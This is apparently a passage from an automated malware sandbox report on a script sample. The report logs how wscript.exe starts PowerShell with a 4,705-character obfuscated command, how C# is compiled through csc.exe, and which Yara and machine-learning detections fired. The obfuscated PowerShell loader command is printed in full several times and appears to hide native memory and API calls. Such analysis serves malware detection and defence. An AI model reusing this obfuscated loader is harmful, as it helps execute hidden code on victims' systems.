routrnrbdseessrne)fo;ko[fldpilpelstidamtephyosyrsytje(ub`"""brgundreigl3ud2un`"""ep)pr]mipunuunbfoladiafcba fesshtdiaditbeidecve sieyaxsktkeeprrrenin coimynnetbl unccormeeevaimtskethspaoheluhiexdalblerdiucascahpa(beibonvatuh cafsyohirba)mi;pe[cuddilouldeiaimlapkrogrrovtdi(ar`"""t
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe c:\windows\syswow64\windowspowershell\v1.0\powershell.exe" "$thyridia = """ovafadandda-ditsiyfipoteco ro-fltmuyzoppreabdinevefpridenabisetfoilroelnmy fe'boujassuiinnsogud hosmiyfesdetnoeidmsa;vaumosphistnbegau vispuynesbrttuevrmta.harreubensctmaievmsterk.iniinnwhthoeoerafoshpsosejedercavchilicpiebrsdi;trpraudibfollaialcvo bospatalasktgoigacgu licdelswastsunsre prmopesptskhdeymilno1en di{ci[dedanloplgliirmcopopocurbutaf(ef`"""unktoelorsensrepelli3ko2ha`"""fr)ji]vopatudrbunlreimicno kosdrtscatitkriircpo chesaxuntslelyrtyngr sriejnbethu peglietetdetkahfirhveunabrdtrtinispmjeeitsco(riiugnjutcr bepinrskostgunrfi8op2we,raiswnsytan meffirskepsmsuakhdov,priafnhytre drtlieunlcoeno,reitvnmitfo witabrfuesydcyiaf,raisbncotur optmyistmtr)sp;ti[bodkrlfilmeiromunpkeoafrcitsu(ha`"""geuunsseenarwi3su2sc`"""us)ci]nypceutobpeladiefcud sqscotgaaretnaidrcro smebyxdotjaegtrtrnpe blichnadtja pocinlacityepanbrtulttrofosrectirvaemdelenbr(neistngltov siiudnwrkliosprbapre,coicencotme zetcoefrkplnfaore)al;un[mudunlcalheinumfrptyopirbrtki(fo`"""wakwoetwrfanfreunlpr3ru2su`"""st)fr]udpdeualbcaltricrcre cosrutgraaltveitacti vaeslxustboenergenpa diisunoktca ineovxhapsaauhnpldunebrnsavpaistrprotrndrmstehynfetflswotunrsvidanabgwesfi(eriblnretst rerecocytsotdeepo,teichnretsu fobufugalma,biimonbitde inebrnoetafoco)re;ra[pldlalavlfuiafmskpbeoanrsutko(te`"""beuelsjieelrst3mu2fy`"""di)to]popvauanbbrlmaipucos ovsretpeaprtpeiufcso toefoxovtmaenortensl prifrnqutbl ameegnpuubamaucpihpoidilnedbewisiefnfldfrokiwbesso(miihontatfu holmiiovtrahfoeindro,anigencatal hydreifoosubmoosl,meiolntutch poataluvuvanungal)va;tr[emdselkrlgoijamprpcoocrrretst(yo`"""mawbeivinlamcombi.nldselfllhe`"""de)no]ilpopuchbtelomibucfo frsretcoachtudijucsa unepnxretmaekvrlgnel veimenintbr injauoopyhusacesetdicdiagepsutbeuavrouece(idiwenfotex afkpeoandunipofno,seispnretbe unvfaelijbe,friesnwitop abedimchpuntmoisp,ceiunnlatfl birureudaviccytduine)po;no[nodtnlhylouiopmakpdeoberaptir(un`"""opkhmenirdrnamemolgr3sf2el`"""kr)li]scpviugrbbrlriiitcpr resfrtgsairtapipacpo uneuhxkrtsyemarranir skvafobyiopdde imgjulreofabdianalspmmaelimmyovarbryhjsettsuatutanufrsub(snifrnretra suawrnjelepgsksemiud)ou;cy[fiddrlsplclibamanpatocorbotno(si`"""ovkanemirunngaecolpr3co2na`"""gr)pr]moptouhabdrlphiskcna sksmatstasetdiiaicva haelyxfotuneenrbrnco saijunpstak unisnsobvpuacolspipldagcmootodstesupsuamagsuesa(ejiafnhytbi caggaakauudmca)fr;fa[codphlhylunidimtypovorurmitfo(mi`"""unkseelirbenriejulch3sl2an`"""sa)si]ampwhuelbsellaisuckl mtsrbtloasptreifocaj mieunxevtsneforbuncu amiteneftte suhoreovadapbirpleseabildelsoorycac(doikonsltfo sthfrablnbedbi,esihennotrk apfunasplsesol,biidansutsu cohdruconlegba,afitrnnetno routrnrbdseessrne)fo;ko[fldpilpelstidamtephyosyrsytje(ub`"""brgundreigl3ud2un`"""ep)pr]mipunuunbfoladiafcba fesshtdiaditbeidecve sieyaxsktkeeprrrenin coimynnetbl unccormeeevaimtskethspaoheluhiexdalblerdiucascahpa(beibonvatuh cafsyohirba)mi;pe[cuddilouldeiaimlapkrogrrovtdi(ar`"""t			Jump to behavior

Creates a process in suspended mode (likely to inject code)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Thyridia = """ovAfadAndDa-diTSiyFipOteCo Ro-FlTMuyZopPreAbDineVefpriDenabiSetFoiLroElnMy Fe'BouJasSuiinnSogud HoSMiyFesDetNoeIdmSa;VauMosPhiStnBegAu ViSPuyNesBrtTuevrmTa.HaRReuBenSctMaiEvmSteRk.InIinnWhtHoeOerAfoShpSoSEjeDerCavChiLicPieBrsDi;TrpRaudibfolLaiAlcvo BosPatAlaSktGoiGacGu LicDelSwaStsUnsRe PrMOpeSptSkhdeyMilNo1En di{Ci[DeDAnlOplglIIrmCopOpocurbutAf(Ef`"""UnkToeLorSenSrePelLi3Ko2ha`"""Fr)ji]VopAtuDrbunlReiMicNo KosDrtScaTitKriIrcPo CheSaxUntSleLyrtynGr SriEjnBetHu PeGLieTetDeTKahFirHveUnaBrdtrTInispmJeeItsCo(riiUgnJutCr BePInrSkoStgUnrFi8Op2We,RaiSwnSytAn MeFFirSkePsmSuaKhdOv,PriAfnHytre drTLieUnlCoeNo,ReiTvnMitFo WiTAbrFueSydCyiAf,raisbnCotUr OpTmyiStmTr)Sp;Ti[BoDKrlFilMeIRomUnpKeoAfrCitSu(Ha`"""GeuunsSeeNarWi3Su2Sc`"""Us)Ci]NypCeuTobPelAdiEfcUd SqsCotGaaRetNaiDrcRo SmebyxDotJaeGtrTrnPe BliChnAdtJa PoCInlAciTyePanBrtUlTTroFoSRecTirVaeMdeLenBr(NeiStnGltOv SiIUdnWrkLioSprBapre,coicenCotMe ZetCoeFrkplnFaore)Al;Un[MuDUnlcalHeINumfrpTyoPirBrtKi(Fo`"""WakWoeTwrFanFreUnlPr3Ru2Su`"""St)Fr]UdpdeuAlbCalTriCrcRe CosRutGraAltVeiTacTi VaeSlxUstboeNerGenPa DiiSunOktCa InEOvxhapSaaUhnPldUnEBrnSavPaistrProTrnDrmSteHynFetflSWotunrSviDanAbgWesFi(EriBlnretSt ReREcoCytSotDeePo,TeiChnRetSu FoBUfugalMa,BiiMonBitDe InEBrnOetafoCo)Re;Ra[PlDLalAvlFuIAfmSkpBeoAnrSutKo(te`"""BeuElsJieElrst3Mu2Fy`"""Di)To]PopVauanbBrlMaiPucOs OvsRetPeaPrtPeiUfcSo toeFoxOvtMaeNorTenSl PriFrnQutbl AmEEgnPuuBamauCPihPoiDilNedBeWIsiEfnFldFrokiwbesSo(MiiHonTatFu hoLMiiOvtRahFoeIndRo,aniGenCatal HyDReiFooSubMooSl,MeiOlnTutCh PoATalUvuVanUngAl)Va;Tr[emDSelKrlGoIJamPrpCooCrrRetst(Yo`"""MawbeiVinLamComBi.NldSelFllHe`"""De)No]IlpOpuChbTelOmiBucFo frsRetCoaChtUdiJucSa UnePnxRetMaekvrLgnEl veiMenIntBr InjAuoOpyHuSAceSetDiCDiaGepSutBeuAvrOueCe(IdiWenfotEx AfKPeoAndUniPofNo,SeiSpnRetBe UnVFaeLijBe,FriEsnWitOp abEDimChpUntMoiSp,CeiUnnLatFl BiRUreUdaVicCytduiNe)Po;No[NoDTnlHylOuIOpmAkpdeoBerAptIr(Un`"""OpkHmeNirdrnAmeMolGr3Sf2El`"""Kr)Li]ScpViuGrbBrlRiiItcPr ResFrtGsaIrtApiPacPo UneUhxKrtSyeMarRanIr skvAfoByiOpdDe ImGjulReoFabDiaNalSpMMaeLimMyoVarBryhjSEttSuaTutAnufrsUb(sniFrnretRa SuAWrnJelEpgSksEmiUd)Ou;Cy[FiDDrlSplClIbamanpAtoCorBotNo(Si`"""OvkAneMirUnnGaeColPr3Co2Na`"""Gr)Pr]mopTouHabdrlPhiSkcNa sksmatStaSetDiiAicva HaeLyxFotUneEnrbrnCo SaiJunPstAk UnISnsObVPuaColSpiPldAgCMooTodSteSuPSuaMagsueSa(EjiAfnHytBi CaGGaaKauudmCa)Fr;Fa[CoDPhlHylUnIDimTypOvorurMitFo(Mi`"""UnkSeeLirBenRieJulCh3Sl2An`"""Sa)Si]AmpwhuElbSelLaiSucKl MtsRbtLoaSptReiFocAj MieunxEvtSneForBunCu AmiTenEftTe SuHOreOvaDapBiRpleSeABilDelsooRycac(DoiKonSltFo StHFraBlnBedBi,EsihenNotRk ApFUnaSplSesOl,BiiDanSutSu coHDruConLegBa,AfiTrnNetNo RoUTrnRbdSeeSsrNe)Fo;Ko[FlDPilPelStIDamTepHyoSyrSytJe(Ub`"""BrgUndReiGl3Ud2Un`"""Ep)Pr]MipUnuUnbFolAdiAfcBa FesShtDiaDitBeiDecVe SieYaxSktKeePrrRenIn CoiMynNetBl UnCCorMeeEvaImtskeThSPaoHelUhiExdAlBLerDiuCascahPa(BeiBonVatUh CaFSyoHirBa)Mi;Pe[CuDDilOulDeIAimLapKroGrrOvtDi(Ar`"""T	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\bqup1euq\bqup1euq.cmdline	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe	Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES47C6.tmp" "c:\Users\user\AppData\Local\Temp\bqup1euq\CSCA347F263B587453BB38F4BBC1F3B31.TMP"	Jump to behavior

Queries the volume information (name, serial number etc) of a device

Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation	Jump to behavior

Source: C:\Windows\System32\wscript.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Screenshots

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Network Map

⊘No contacted IP infos

AV Detection

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Local\Temp\bqup1euq\bqup1euq.dll

Joe Sandbox ML: detected

Source:

Binary string: l:C:\Users\user\AppData\Local\Temp\bqup1euq\bqup1euq.pdb source: powershell.exe, 00000003.00000002.541727874.0000000005789000.00000004.00000800.00020000.00000000.sdmp

Source: powershell.exe, 00000003.00000002.545558610.0000000005F20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000003.00000002.528909181.0000000004FFF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000003.00000002.526784989.0000000004EC1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000003.00000002.528909181.0000000004FFF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000003.00000002.545558610.0000000005F20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000003.00000002.545558610.0000000005F20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000003.00000002.545558610.0000000005F20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000003.00000002.528909181.0000000004FFF000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000003.00000002.536819420.0000000005484000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://go.micro
Source: powershell.exe, 00000003.00000002.545558610.0000000005F20000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://nuget.org/nuget.exe

System Summary

Malicious sample detected (through community Yara rule)

Source: Process Memory Space: powershell.exe PID: 5064, type: MEMORYSTR

Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen

Wscript starts Powershell (via cmd or directly)

Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Thyridia = """ovAfadAndDa-diTSiyFipOteCo Ro-FlTMuyZopPreAbDineVefpriDenabiSetFoiLroElnMy Fe'BouJasSuiinnSogud HoSMiyFesDetNoeIdmSa;VauMosPhiStnBegAu ViSPuyNesBrtTuevrmTa.HaRReuBenSctMaiEvmSteRk.InIinnWhtHoeOerAfoShpSoSEjeDerCavChiLicPieBrsDi;TrpRaudibfolLaiAlcvo BosPatAlaSktGoiGacGu LicDelSwaStsUnsRe PrMOpeSptSkhdeyMilNo1En di{Ci[DeDAnlOplglIIrmCopOpocurbutAf(Ef`"""UnkToeLorSenSrePelLi3Ko2ha`"""Fr)ji]VopAtuDrbunlReiMicNo KosDrtScaTitKriIrcPo CheSaxUntSleLyrtynGr SriEjnBetHu PeGLieTetDeTKahFirHveUnaBrdtrTInispmJeeItsCo(riiUgnJutCr BePInrSkoStgUnrFi8Op2We,RaiSwnSytAn MeFFirSkePsmSuaKhdOv,PriAfnHytre drTLieUnlCoeNo,ReiTvnMitFo WiTAbrFueSydCyiAf,raisbnCotUr OpTmyiStmTr)Sp;Ti[BoDKrlFilMeIRomUnpKeoAfrCitSu(Ha`"""GeuunsSeeNarWi3Su2Sc`"""Us)Ci]NypCeuTobPelAdiEfcUd SqsCotGaaRetNaiDrcRo SmebyxDotJaeGtrTrnPe BliChnAdtJa PoCInlAciTyePanBrtUlTTroFoSRecTirVaeMdeLenBr(NeiStnGltOv SiIUdnWrkLioSprBapre,coicenCotMe ZetCoeFrkplnFaore)Al;Un[MuDUnlcalHeINumfrpTyoPirBrtKi(Fo`"""WakWoeTwrFanFreUnlPr3Ru2Su`"""St)Fr]UdpdeuAlbCalTriCrcRe CosRutGraAltVeiTacTi VaeSlxUstboeNerGenPa DiiSunOktCa InEOvxhapSaaUhnPldUnEBrnSavPaistrProTrnDrmSteHynFetflSWotunrSviDanAbgWesFi(EriBlnretSt ReREcoCytSotDeePo,TeiChnRetSu FoBUfugalMa,BiiMonBitDe InEBrnOetafoCo)Re;Ra[PlDLalAvlFuIAfmSkpBeoAnrSutKo(te`"""BeuElsJieElrst3Mu2Fy`"""Di)To]PopVauanbBrlMaiPucOs OvsRetPeaPrtPeiUfcSo toeFoxOvtMaeNorTenSl PriFrnQutbl AmEEgnPuuBamauCPihPoiDilNedBeWIsiEfnFldFrokiwbesSo(MiiHonTatFu hoLMiiOvtRahFoeIndRo,aniGenCatal HyDReiFooSubMooSl,MeiOlnTutCh PoATalUvuVanUngAl)Va;Tr[emDSelKrlGoIJamPrpCooCrrRetst(Yo`"""MawbeiVinLamComBi.NldSelFllHe`"""De)No]IlpOpuChbTelOmiBucFo frsRetCoaChtUdiJucSa UnePnxRetMaekvrLgnEl veiMenIntBr InjAuoOpyHuSAceSetDiCDiaGepSutBeuAvrOueCe(IdiWenfotEx AfKPeoAndUniPofNo,SeiSpnRetBe UnVFaeLijBe,FriEsnWitOp abEDimChpUntMoiSp,CeiUnnLatFl BiRUreUdaVicCytduiNe)Po;No[NoDTnlHylOuIOpmAkpdeoBerAptIr(Un`"""OpkHmeNirdrnAmeMolGr3Sf2El`"""Kr)Li]ScpViuGrbBrlRiiItcPr ResFrtGsaIrtApiPacPo UneUhxKrtSyeMarRanIr skvAfoByiOpdDe ImGjulReoFabDiaNalSpMMaeLimMyoVarBryhjSEttSuaTutAnufrsUb(sniFrnretRa SuAWrnJelEpgSksEmiUd)Ou;Cy[FiDDrlSplClIbamanpAtoCorBotNo(Si`"""OvkAneMirUnnGaeColPr3Co2Na`"""Gr)Pr]mopTouHabdrlPhiSkcNa sksmatStaSetDiiAicva HaeLyxFotUneEnrbrnCo SaiJunPstAk UnISnsObVPuaColSpiPldAgCMooTodSteSuPSuaMagsueSa(EjiAfnHytBi CaGGaaKauudmCa)Fr;Fa[CoDPhlHylUnIDimTypOvorurMitFo(Mi`"""UnkSeeLirBenRieJulCh3Sl2An`"""Sa)Si]AmpwhuElbSelLaiSucKl MtsRbtLoaSptReiFocAj MieunxEvtSneForBunCu AmiTenEftTe SuHOreOvaDapBiRpleSeABilDelsooRycac(DoiKonSltFo StHFraBlnBedBi,EsihenNotRk ApFUnaSplSesOl,BiiDanSutSu coHDruConLegBa,AfiTrnNetNo RoUTrnRbdSeeSsrNe)Fo;Ko[FlDPilPelStIDamTepHyoSyrSytJe(Ub`"""BrgUndReiGl3Ud2Un`"""Ep)Pr]MipUnuUnbFolAdiAfcBa FesShtDiaDitBeiDecVe SieYaxSktKeePrrRenIn CoiMynNetBl UnCCorMeeEvaImtskeThSPaoHelUhiExdAlBLerDiuCascahPa(BeiBonVatUh CaFSyoHirBa)Mi;Pe[CuDDilOulDeIAimLapKroGrrOvtDi(Ar`"""T
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\System32\cmd.exe CMD.EXE /c echo C:\Windows	Jump to behavior
Source: C:\Windows\System32\wscript.exe	Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Thyridia = """ovAfadAndDa-diTSiyFipOteCo Ro-FlTMuyZopPreAbDineVefpriDenabiSetFoiLroElnMy Fe'BouJasSuiinnSogud HoSMiyFesDetNoeIdmSa;VauMosPhiStnBegAu ViSPuyNesBrtTuevrmTa.HaRReuBenSctMaiEvmSteRk.InIinnWhtHoeOerAfoShpSoSEjeDerCavChiLicPieBrsDi;TrpRaudibfolLaiAlcvo BosPatAlaSktGoiGacGu LicDelSwaStsUnsRe PrMOpeSptSkhdeyMilNo1En di{Ci[DeDAnlOplglIIrmCopOpocurbutAf(Ef`"""UnkToeLorSenSrePelLi3Ko2ha`"""Fr)ji]VopAtuDrbunlReiMicNo KosDrtScaTitKriIrcPo CheSaxUntSleLyrtynGr SriEjnBetHu PeGLieTetDeTKahFirHveUnaBrdtrTInispmJeeItsCo(riiUgnJutCr BePInrSkoStgUnrFi8Op2We,RaiSwnSytAn MeFFirSkePsmSuaKhdOv,PriAfnHytre drTLieUnlCoeNo,ReiTvnMitFo WiTAbrFueSydCyiAf,raisbnCotUr OpTmyiStmTr)Sp;Ti[BoDKrlFilMeIRomUnpKeoAfrCitSu(Ha`"""GeuunsSeeNarWi3Su2Sc`"""Us)Ci]NypCeuTobPelAdiEfcUd SqsCotGaaRetNaiDrcRo SmebyxDotJaeGtrTrnPe BliChnAdtJa PoCInlAciTyePanBrtUlTTroFoSRecTirVaeMdeLenBr(NeiStnGltOv SiIUdnWrkLioSprBapre,coicenCotMe ZetCoeFrkplnFaore)Al;Un[MuDUnlcalHeINumfrpTyoPirBrtKi(Fo`"""WakWoeTwrFanFreUnlPr3Ru2Su`"""St)Fr]UdpdeuAlbCalTriCrcRe CosRutGraAltVeiTacTi VaeSlxUstboeNerGenPa DiiSunOktCa InEOvxhapSaaUhnPldUnEBrnSavPaistrProTrnDrmSteHynFetflSWotunrSviDanAbgWesFi(EriBlnretSt ReREcoCytSotDeePo,TeiChnRetSu FoBUfugalMa,BiiMonBitDe InEBrnOetafoCo)Re;Ra[PlDLalAvlFuIAfmSkpBeoAnrSutKo(te`"""BeuElsJieElrst3Mu2Fy`"""Di)To]PopVauanbBrlMaiPucOs OvsRetPeaPrtPeiUfcSo toeFoxOvtMaeNorTenSl PriFrnQutbl AmEEgnPuuBamauCPihPoiDilNedBeWIsiEfnFldFrokiwbesSo(MiiHonTatFu hoLMiiOvtRahFoeIndRo,aniGenCatal HyDReiFooSubMooSl,MeiOlnTutCh PoATalUvuVanUngAl)Va;Tr[emDSelKrlGoIJamPrpCooCrrRetst(Yo`"""MawbeiVinLamComBi.NldSelFllHe`"""De)No]IlpOpuChbTelOmiBucFo frsRetCoaChtUdiJucSa UnePnxRetMaekvrLgnEl veiMenIntBr InjAuoOpyHuSAceSetDiCDiaGepSutBeuAvrOueCe(IdiWenfotEx AfKPeoAndUniPofNo,SeiSpnRetBe UnVFaeLijBe,FriEsnWitOp abEDimChpUntMoiSp,CeiUnnLatFl BiRUreUdaVicCytduiNe)Po;No[NoDTnlHylOuIOpmAkpdeoBerAptIr(Un`"""OpkHmeNirdrnAmeMolGr3Sf2El`"""Kr)Li]ScpViuGrbBrlRiiItcPr ResFrtGsaIrtApiPacPo UneUhxKrtSyeMarRanIr skvAfoByiOpdDe ImGjulReoFabDiaNalSpMMaeLimMyoVarBryhjSEttSuaTutAnufrsUb(sniFrnretRa SuAWrnJelEpgSksEmiUd)Ou;Cy[FiDDrlSplClIbamanpAtoCorBotNo(Si`"""OvkAneMirUnnGaeColPr3Co2Na`"""Gr)Pr]mopTouHabdrlPhiSkcNa sksmatStaSetDiiAicva HaeLyxFotUneEnrbrnCo SaiJunPstAk UnISnsObVPuaColSpiPldAgCMooTodSteSuPSuaMagsueSa(EjiAfnHytBi CaGGaaKauudmCa)Fr;Fa[CoDPhlHylUnIDimTypOvorurMitFo(Mi`"""UnkSeeLirBenRieJulCh3Sl2An`"""Sa)Si]AmpwhuElbSelLaiSucKl MtsRbtLoaSptReiFocAj MieunxEvtSneForBunCu AmiTenEftTe SuHOreOvaDapBiRpleSeABilDelsooRycac(DoiKonSltFo StHFraBlnBedBi,EsihenNotRk ApFUnaSplSesOl,BiiDanSutSu coHDruConLegBa,AfiTrnNetNo RoUTrnRbdSeeSsrNe)Fo;Ko[FlDPilPelStIDamTepHyoSyrSytJe(Ub`"""BrgUndReiGl3Ud2Un`"""Ep)Pr]MipUnuUnbFolAdiAfcBa FesShtDiaDitBeiDecVe SieYaxSktKeePrrRenIn CoiMynNetBl UnCCorMeeEvaImtskeThSPaoHelUhiExdAlBLerDiuCascahPa(BeiBonVatUh CaFSyoHirBa)Mi;Pe[CuDDilOulDeIAimLapKroGrrOvtDi(Ar`"""T	Jump to behavior

Very long command line found

Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 4705
Source: C:\Windows\System32\wscript.exe	Process created: Commandline size = 4705			Jump to behavior

Yara signature match

